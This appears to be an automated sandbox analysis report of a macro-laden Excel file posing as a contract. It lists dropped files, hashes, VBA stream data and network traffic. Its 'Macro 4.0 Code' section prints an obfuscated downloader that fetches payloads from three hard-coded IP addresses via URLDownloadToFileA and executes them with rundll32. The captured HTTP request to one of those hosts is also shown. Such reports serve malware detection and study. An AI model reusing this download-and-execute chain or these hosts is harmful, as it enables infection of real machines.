              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\78389088.gif
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:GIF image data, version 89a, 1600 x 1600
              Category:dropped
              Size (bytes):158055
              Entropy (8bit):7.981278766139217
              Encrypted:false
              SSDEEP:3072:4XE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGq:AE5SDvbXAyHbVt15wTQDl
              MD5:CB67CED3017DF7803FBA5D86FCEB4276
              SHA1:C7B8B4A44BDF7F7775F61FCF236A0834CB321733
              SHA-256:C31F711B323EA0B1D04C7A72ECAC0BBBF4DC4ECC56F837FEFE754F53385D07B1
              SHA-512:1E70FD6101A50A0AEDFF22C2DB22A5FB4E063C02E6C062097A973FED663E6623BDA2FFA33B266001AB99BA5AA945FA51C1571C553015C8F8633D68BFA7F663D1
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: GIF89a@.@.p..!.......,....@.@.......3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................y..Hp.....*L.p....J.Hq.../j..q.. ?..Ir..(O.L.r..0_.Is...=...y.M..@y.....O.>......D...z.h.L.<e...6..tm....9.......Y.d..]....h...V._.^...kv-.e...6...i.>N..1....C....d.n.}..,..bM_.<:.h.
              C:\Users\user\AppData\Local\Temp\31CE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):178363
              Entropy (8bit):7.963023812836433
              Encrypted:false
              SSDEEP:3072:3+F5XE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGI:3UE5SDvbXAyHbVt15wTQD5
              MD5:949AE9FF92AC516992ED13AD56DDF54D
              SHA1:5A77430BD747A1C2C2A72139AB232DF7EE1DFE3D
              SHA-256:4F5BFE1448322EEF7FC797D3A2F38088101B709FB8D588DE66FCF7016C1D0019
              SHA-512:EC307A5B8265E8D260D8D0E26704A512668B75C297E23509BC66A5E0F769B8F007A24D3DCD3C6FC75DAF73499F741F50C241AA0FFE96CCC28D4CCBA054371621
              Malicious:false
              Reputation:low
              Preview: .U.n.0....?..."..(..r.izl.$...\I....8..wI;vk....E/jgv....fet.........R..N*.5....+.b.Vr.,4d....>~.>.=...mlH....X.=....`q.u.....c....]O&_.p6.Mu..d6..-...[..M'seIu../S5.{.....eK+.Hj.J.t.. 4.>....HFS..2..H..E.r..q..V....X..P....rZ..N..u.d7.w...70(..=..'7..[i...b.....f.X.J...1j......\..j:.T*#+...(.=$../+).#...O}......}.....[./...4./.u<M...V.o??.f.......Z......s......{..c..!...-....}.......>.'....=..M..}....G`.q......y..k.@...]..K..#...S.... .p.2pg........PK..........!.x...............[Content_Types].xml ...(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Contract_132508562.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:11 2020, mtime=Tue Apr 6 20:09:34 2021, atime=Tue Apr 6 20:09:34 2021, length=178366, window=hide
              Category:dropped
              Size (bytes):2118
              Entropy (8bit):4.558247455185117
              Encrypted:false
              SSDEEP:24:8w/XTr6N4U8HnkaBNemR3kaPDv3qfdM7dD2w/XTr6N4U8HnkaBNemR3kaPDv3qfg:8w/XT+Nno/BhyfQh2w/XT+Nno/BhyfQ/
              MD5:5897FB0CD474276682D6D759931D0055
              SHA1:5A725A04545AD09395F432909D7D5B83C608BC65
              SHA-256:FB19E6922C182E0FC81CF4411D43F625C15503A4C9CC0DECD3BF62EBA7866B14
              SHA-512:3A19CE1DF5D9C9E018CD617E330CFB5FADB4633F6054FB24961B07CD1ED6A88D29E1FE470ED6F1079C62BDEE03D8B6E868580A5B1FA47E36740C4224972DDC30
              Malicious:false
              Reputation:low
              Preview: L..................F.... .......{...)<%)+....@%)+...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2......R.. .CONTRA~1.XLS..\.......Q.y.Q.y*...8.....................C.o.n.t.r.a.c.t._.1.3.2.5.0.8.5.6.2...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\688098\Users.user\Desktop\Contract_132508562.xlsm.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.n.t.r.a.c.t._.1.3.2.5.0.8.5.6.2...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......688098..........D_....3N.
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Apr 6 20:09:34 2021, atime=Tue Apr 6 20:09:34 2021, length=8192, window=hide
              Category:dropped
              Size (bytes):867
              Entropy (8bit):4.481337285670163
              Encrypted:false
              SSDEEP:12:85Q7YPcLgXg/XAlCPCHaX7B8NB/bKxX+WnicvbwbDtZ3YilMMEpxRljK6TdJP9TK:85FPK/XTr6NkYegDv3qfrNru/
              MD5:7F78464498B726D3F31897491BC91A1D
              SHA1:661D453587D778AC3B08718644D42F2ACF78F8A7
              SHA-256:21400C88B3626C6183586F9BB63B9351746F4BCF51DF9A136DBE86DE3373F56D
              SHA-512:A41783C0B2C306AC0D2514FACBDE734771C48B6F5DAF84B0E71FA1DB6512AD43E7581C5B28BBF361A590BAD9BCE9DE0A2750FDC9B5DD27ADC56493C708DC21EE
              Malicious:false
              Reputation:low
              Preview: L..................F...........7G...)<%)+...)<%)+... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R2...Desktop.d......QK.X.R2.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\688098\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......688098..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):109
              Entropy (8bit):4.781940430995407
              Encrypted:false
              SSDEEP:3:oyBVomxWt7Gc1TXLUl+EUGc1TXLUlmxWt7Gc1TXLUlv:djeCQTXLUdQTXLUzCQTXLU1
              MD5:2747EA491ECD274541188B946DBEAD52
              SHA1:2A2A3512122B2BD922198D13BAF6553133070B9B
              SHA-256:1AE9A2620049FE85A0455585E86DF191D62B6BA603C97E3E98949575178C02EC
              SHA-512:F6332A74651850286C30BD107B45D1FE1F6D9A49065EFF2E5212743C26E193924856C9F7A5702C37FBFC824CF6765488082D7A274E53F709620938CE463E1595
              Malicious:false
              Reputation:low
              Preview: Desktop.LNK=0..[misc]..Contract_132508562.LNK=0..Contract_132508562.LNK=0..[misc]..Contract_132508562.LNK=0..
              C:\Users\user\Desktop\E1CE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):178366
              Entropy (8bit):7.962899625504022
              Encrypted:false
              SSDEEP:3072:3w6XE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGM:3LE5SDvbXAyHbVt15wTQD9
              MD5:AE2CD11A4570994A34BB8812C87389B4
              SHA1:FB58182D407387BF27B3E676D160CB9E3F50384A
              SHA-256:27CA81FBCD49CB5F3065D76A55CCF4B0642CC8A94A98AEEEDE14809B26B184D6
              SHA-512:86242318FAEF43B6764FF22E5E29E244E46C6CCFCA1FDCC99FAB65BCA9B3C0EFCA235098FDB4627704873FE61028F358EDE53BB283EFFA4493E0F73CF1DDF937
              Malicious:false
              Reputation:low
              Preview: .U.n.0....?..."..(..r.izl.$...\I....8..wI;vk....E/jgv....fet.........R..N*.5....+.b.Vr.,4d....>~.>.=...mlH....X.=....`q.u.....c....]O&_.p6.Mu..d6..-...[..M'seIu../S5.{.....eK+.Hj.J.t.. 4.>....HFS..2..H..E.r..q..V....X..P....rZ..N..u.d7.w...70(..=..'7..[i...b.....f.X.J...1j......\..j:.T*#+...(.=$../+).#...O}......}.....[./...4./.u<M...V.o??.f.......Z......s......{..c..!...-....}.......>.'....=..M..}....G`.q......y..k.@...]..K..#...S.... .p.2pg........PK..........!.x...............[Content_Types].xml ...(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\Desktop\~$Contract_132508562.xlsm
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):330
              Entropy (8bit):1.4377382811115937
              Encrypted:false
              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
              MD5:96114D75E30EBD26B572C1FC83D1D02E
              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
              Malicious:true
              Reputation:high, very likely benign file
              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

              Static File Info

              General

              File type:Microsoft Excel 2007+
              Entropy (8bit):7.963229655761012
              TrID:
              • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
              • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
              • ZIP compressed archive (8000/1) 7.58%
              File name:Contract_132508562.xlsm
              File size:178369
              MD5:4acf095722b577ef282e9b2b736de65d
              SHA1:fbb4e8aee2d48443cd9ee930fc79891edc88edaa
              SHA256:8815a2be7dfd8565affb9271d229aab6289a97a96de5428c966fad85c6141e68
              SHA512:72cc25cf42e1dd36a27164643ca978a16422c9e7cd03a16a78ad36cc4279959a68102c78cc76b5148f378e0413637187e86a886ed4cd9cd250403a39c19c40b8
              SSDEEP:3072:qHYXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGUmh:qHgE5SDvbXAyHbVt15wTQDjmh
              File Content Preview:PK..........!..D.C............[Content_Types].xml ...(.........................................................................................................................................................................................................

              File Icon

              Icon Hash:e4e2aa8aa4bcbcac

              Static OLE Info

              General

              Document Type:OpenXML
              Number of OLE Files:1

              OLE File "/opt/package/joesandbox/database/analysis/382682/sample/Contract_132508562.xlsm"

              Indicators

              Has Summary Info:False
              Application Name:unknown
              Encrypted Document:False
              Contains Word Document Stream:
              Contains Workbook/Book Stream:
              Contains PowerPoint Document Stream:
              Contains Visio Document Stream:
              Contains ObjectPool Stream:
              Flash Objects Count:
              Contains VBA Macros:True

              Summary

              Author:Rabota
              Last Saved By:Noped
              Create Time:2015-06-05T18:19:34Z
              Last Saved Time:2021-04-05T10:24:08Z
              Creating Application:Microsoft Excel
              Security:0

              Document Summary

              Thumbnail Scaling Desired:false
              Company:
              Contains Dirty Links:false
              Shared Document:false
              Changed Hyperlinks:false
              Application Version:16.0300

              Streams with VBA

              VBA File Name: Module1.bas, Stream Size: 1415
              General
              Stream Path:VBA/Module1
              VBA File Name:Module1.bas
              Stream Size:1415
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:01 16 03 00 02 f0 00 00 00 f2 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 20 03 00 00 ec 04 00 00 00 00 00 00 01 00 00 00 d2 b3 f0 e3 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

              VBA Code Keywords

              Keyword
              Application.ScreenUpdating
              Application.Run
              Attribute
              Auto_Open()
              VB_Name
              Private
              VBA Code

              Streams

              Stream Path: PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 587
              General
              Stream Path:PROJECT
              File Type:ISO-8859 text, with CRLF line terminators
              Stream Size:587
              Entropy:5.30322377136
              Base64 Encoded:True
              Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = . . . . . . . . / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . D o c u m e n t = . . . . 2 / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 B 6 9 C 7 7 2 2 A 7 6 2 A 7 6 2 E 7 A 2 E
              Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d dd f2 e0 ca ed e8 e3 e0 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb
              Stream Path: PROJECTwm, File Type: data, Stream Size: 89
              General
              Stream Path:PROJECTwm
              File Type:data
              Stream Size:89
              Entropy:3.99189663324
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . 1 . . . 8 . A . B . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . . . . 2 . . . 8 . A . B . 2 . . . . .
              Data Raw:dd f2 e0 ca ed e8 e3 e0 00 2d 04 42 04 30 04 1a 04 3d 04 38 04 33 04 30 04 00 00 cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 cb e8 f1 f2 32 00 1b 04 38 04 41 04 42 04 32 00 00 00 00 00
              Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3165
              General
              Stream Path:VBA/_VBA_PROJECT
              File Type:data
              Stream Size:3165
              Entropy:4.47387908896
              Base64 Encoded:False
              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
              Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
              Stream Path: VBA/dir, File Type: data, Stream Size: 575
              General
              Stream Path:VBA/dir
              File Type:data
              Stream Size:575
              Entropy:6.43198224607
              Base64 Encoded:True
              Data ASCII:. ; . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . l . ^ b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
              Data Raw:01 3b b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 6c a6 5e 62 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
              Stream Path: VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 1014
              General
              Stream Path:VBA/\x1051\x1080\x1089\x10901
              File Type:data
              Stream Size:1014
              Entropy:3.25066068683
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . . . . . . . . . . . . n } . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:01 16 03 00 01 f0 00 00 00 ea 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff f1 02 00 00 45 03 00 00 00 00 00 00 01 00 00 00 d2 b3 6e 7d 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: VBA/\x1051\x1080\x1089\x10902, File Type: data, Stream Size: 1278
              General
              Stream Path:VBA/\x1051\x1080\x1089\x10902
              File Type:data
              Stream Size:1278
              Entropy:3.41554657424
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . M . . . . . . . . . . . . . b 7 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . ? . . J . . $ . . . ; . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . f < . @ . . h | . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:01 16 03 00 01 00 01 00 00 e2 03 00 00 e4 00 00 00 10 02 00 00 10 04 00 00 e9 03 00 00 4d 04 00 00 00 00 00 00 01 00 00 00 d2 b3 62 37 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 c8 5a f9 c4 3f e9 97 4a 88 a0 24 7f be c3 3b 18 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072, File Type: data, Stream Size: 1425
              General
              Stream Path:VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072
              File Type:data
              Stream Size:1425
              Entropy:3.30339911501
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . b . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . o u . . B . P 2 . @ . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . 3 . Z 4 A ? E . . . | . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:01 16 03 00 01 00 01 00 00 62 04 00 00 e4 00 00 00 10 02 00 00 90 04 00 00 69 04 00 00 d9 04 00 00 00 00 00 00 01 00 00 00 d2 b3 f3 e4 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 a3 48 f6 6f 75 d3 0a 42 90 50 32 bc 40 c7 bd 81 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

              Macro 4.0 Code

              "=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur1""&"",PluginInit"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()"=GOTO(Hi!D4)
              ,,,,,,=NOW(),,,,,,,,,,,,,"=NOW()=NOW()=NOW()=FORMULA(""URLDownloadToFileA"",CE271)",,,,,,,,,,,,"=CONCATENATE(CC274,CD266,CC273)",,,,,,,,,,,,,"=CONCATENATE(CC275,CD266,CC273)","=NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE269,CE273,,1,9)=NOW()=NOW()",JJCCJJ,,,,,,,,,,,"=CONCATENATE(CC276,CD266,CC273)","=NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE272,CE273,,1,9)",uRlMon,,,,,,,,,,,,"=NOW()=NOW()=NOW()=Belandes(0,CC268,""..\Hodas.vyur"",0,0)",,,,,,,,,,,,,"=NOW()=NOW()=NOW()=Belandes(0,CC269,""..\Hodas.vyur1"",0,0)",JJCCBB,,,,,,,,,,,"="".dat""","=NOW()=NOW()=NOW()=Belandes(0,CC270,""..\Hodas.vyur2"",0,0)",Belandes,,,,,,,,,,,"=""http://83.136.232.110/""",,,,,,,,,,,,,"=""http://185.212.131.194/""",,,,,,,,,,,,,"=""http://190.14.37.247/""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur""&"",PluginInit"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(Jo!E4),,,,,,,
              "=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur2""&"",PluginInit"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()"=HALT()

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              04/06/21-14:10:42.901468TCP1201ATTACK-RESPONSES 403 Forbidden8049167185.212.131.194192.168.2.22
              04/06/21-14:10:46.125461ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
              04/06/21-14:10:49.132603ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
              04/06/21-14:10:55.132936ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
              04/06/21-14:11:07.153186ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
              04/06/21-14:11:10.163601ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
              04/06/21-14:11:16.163275ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Apr 6, 2021 14:10:00.524386883 CEST4916580192.168.2.2283.136.232.110
              Apr 6, 2021 14:10:03.525688887 CEST4916580192.168.2.2283.136.232.110
              Apr 6, 2021 14:10:09.532069921 CEST4916580192.168.2.2283.136.232.110
              Apr 6, 2021 14:10:21.548110962 CEST4916680192.168.2.2283.136.232.110
              Apr 6, 2021 14:10:24.556101084 CEST4916680192.168.2.2283.136.232.110
              Apr 6, 2021 14:10:30.562788010 CEST4916680192.168.2.2283.136.232.110
              Apr 6, 2021 14:10:42.608968019 CEST4916780192.168.2.22185.212.131.194
              Apr 6, 2021 14:10:42.657424927 CEST8049167185.212.131.194192.168.2.22
              Apr 6, 2021 14:10:42.657589912 CEST4916780192.168.2.22185.212.131.194
              Apr 6, 2021 14:10:42.658754110 CEST4916780192.168.2.22185.212.131.194
              Apr 6, 2021 14:10:42.706679106 CEST8049167185.212.131.194192.168.2.22
              Apr 6, 2021 14:10:42.901468039 CEST8049167185.212.131.194192.168.2.22
              Apr 6, 2021 14:10:42.901726961 CEST4916780192.168.2.22185.212.131.194
              Apr 6, 2021 14:10:42.922122002 CEST4916880192.168.2.22190.14.37.247
              Apr 6, 2021 14:10:45.930079937 CEST4916880192.168.2.22190.14.37.247
              Apr 6, 2021 14:10:51.936670065 CEST4916880192.168.2.22190.14.37.247
              Apr 6, 2021 14:11:03.952800035 CEST4916980192.168.2.22190.14.37.247
              Apr 6, 2021 14:11:06.961257935 CEST4916980192.168.2.22190.14.37.247
              Apr 6, 2021 14:11:12.967473984 CEST4916980192.168.2.22190.14.37.247
              Apr 6, 2021 14:11:47.967628956 CEST8049167185.212.131.194192.168.2.22
              Apr 6, 2021 14:11:47.967998028 CEST4916780192.168.2.22185.212.131.194
              Apr 6, 2021 14:11:53.945751905 CEST4916780192.168.2.22185.212.131.194
              Apr 6, 2021 14:11:53.993705034 CEST8049167185.212.131.194192.168.2.22

              HTTP Request Dependency Graph

              • 185.212.131.194

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.2249167185.212.131.19480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Apr 6, 2021 14:10:42.658754110 CEST0OUTGET /44285,5327891204.dat HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: 185.212.131.194
              Connection: Keep-Alive
